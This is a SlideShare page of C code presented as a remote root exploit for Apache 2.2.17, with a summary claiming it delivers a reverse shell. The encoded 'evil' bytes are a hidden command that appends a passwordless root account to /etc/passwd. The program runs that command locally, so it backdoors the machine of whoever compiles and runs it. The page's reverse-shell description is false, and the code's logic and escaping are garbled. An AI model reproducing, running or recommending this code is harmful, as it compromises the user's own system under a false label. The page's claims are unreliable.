Yg byev2e
?Download as TXT, PDF?
0 likes?194 views
This C code defines an exploit that can be used to remotely gain root access on an Apache 2.2.17 server by sending a crafted buffer to port 80. It includes encoded shellcode that executes a reverse shell, and builds a buffer containing NOP sleds, shellcode, and trailing characters to exploit a vulnerability. It connects to the target, sends the malicious buffer, and waits for a reverse shell if successful.
![/* apachesm4sh.c apache 2.2.17 remote root exploit*/
/* KEEP PRIV8&!&! leak and i will find you :) ~ desg */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char evil[] =
"xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89"
"x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89"
"x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8"
"xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23"
"x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74"
"x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a"
"x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68"
"x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64"
"x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44"
"x44x44";
#define NOP 0x90
#define BSIZE 1000
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2) {
printf("%s <target>n", argv[0]);
exit(1);
}
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memoryn");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(evil)], evil,
strlen(evil));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '0';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such servern");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socketn");](https://image.slidesharecdn.com/ygbyev2e-120731050750-phpapp01/85/Yg-byev2e-1-320.jpg)
Yg byev2e
- 1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/ /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <strings.h> #include <netdb.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> char evil[] = "xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89" "x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89" "x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8" "xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23" "x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74" "x3ax3ax30x3ax30x3ax73x34x66x65x6dx30x64x65x3a" "x2fx72x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68" "x20x3ex3ex20x2fx65x74x63x2fx70x61x73x73x77x64" "x23x41x41x41x41x42x42x42x42x43x43x43x43x44x44" "x44x44"; #define NOP 0x90 #define BSIZE 1000 #define OFFSET 400 #define ADDR 0xbffff658 #define ASIZE 2000 int main(int argc, char *argv[]) { char *buffer; int s; struct hostent *hp; struct sockaddr_in sin; if (argc != 2) { printf("%s <target>n", argv[0]); exit(1); } buffer = (char *) malloc(BSIZE + ASIZE + 100); if (buffer == NULL) { printf("Not enough memoryn"); exit(1); } memcpy(&buffer[BSIZE - strlen(evil)], evil, strlen(evil)); buffer[BSIZE + ASIZE] = ';'; buffer[BSIZE + ASIZE + 1] = '0'; hp = gethostbyname(argv[1]); if (hp == NULL) { printf("no such servern"); exit(1); } bzero(&sin, sizeof(sin)); bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length); sin.sin_family = AF_INET; sin.sin_port = htons(80); s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s < 0) { printf("Can't open socketn");
- 2. exit(1); } if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) { printf("Connection refusedn"); exit(1); } printf("sending exploit code...n"); if (send(s, buffer, strlen(buffer), 0) != 1) printf("exploit was successful!n"); else printf("sorry, this site isn't vulnerablen"); printf("waiting for shell.....n"); if (fork() == 0) execl("/bin/sh", "sh", "-c", evil, 0); else wait(NULL); while (1) { /* shell */ } }